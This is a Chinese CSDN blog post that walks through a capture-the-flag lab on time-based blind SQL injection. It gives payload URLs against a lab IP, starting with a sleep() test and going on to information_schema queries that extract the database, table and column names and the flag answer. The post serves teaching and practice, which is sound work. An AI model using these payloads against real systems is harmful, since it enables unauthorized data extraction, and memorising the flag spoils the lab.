360众测靶场题库之56-SQL注入漏洞测试(时间盲注)

文章描述了一个关于SQL注入的问题,通过观察回显信息,作者发现了一个可能的注入点。随后通过一系列SQL查询,成功获取了数据库名、表名、flag列名以及特定flag值,展示了逐步破解的过程。
摘要由CSDN通过智能技术生成

图上已经有提示使用?type=进行验证,不能像之前一样进行?id=1,正常是先构造闭合,最后发现竟然不需要……

http://219.153.49.228:41617/flag.php?type=1 and sleep(100) %23

1.根据回显信息进行注入

判断数据库的库名长度,但是在操作时,发现有回显,感觉这道题应该不止时间盲注一种方法,寻找注入点

http://219.153.49.228:41617/flag.php?type=1 %23

通过修改1发现下面的名称也随之改变,说明1是注入点,通过该注入点获取数据库各类信息

获取数据库名为 pentesterlab

http://219.153.49.228:41617/flag.php?type=database() %23

获取数据库表名为  comment,flag,goods,user

http://219.153.49.228:41617/flag.php?type=group_concat(table_name) from information_schema.tables where table_schema=database() %23

获取flag

http://219.153.49.228:41617/flag.php?type=group_concat(column_name) from information_schema.columns where table_name='flag' %23

获取flag为 mozhe1

http://219.153.49.228:41617/flag.php?type=group_concat(flag) from pentesterlab.flag %23

拿到key

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值